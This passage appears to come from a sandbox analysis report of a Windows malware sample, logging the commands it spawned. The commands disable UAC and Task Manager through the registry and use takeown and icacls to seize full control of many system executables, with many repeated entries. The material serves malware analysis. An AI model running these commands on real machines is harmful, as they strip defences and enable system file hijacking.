PID 4432 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe

"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\bfsvc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\HelpPane.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\hh.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\splwow64.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\winhlp32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\write.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\raserver.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\msra.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\logagent.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\runas.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

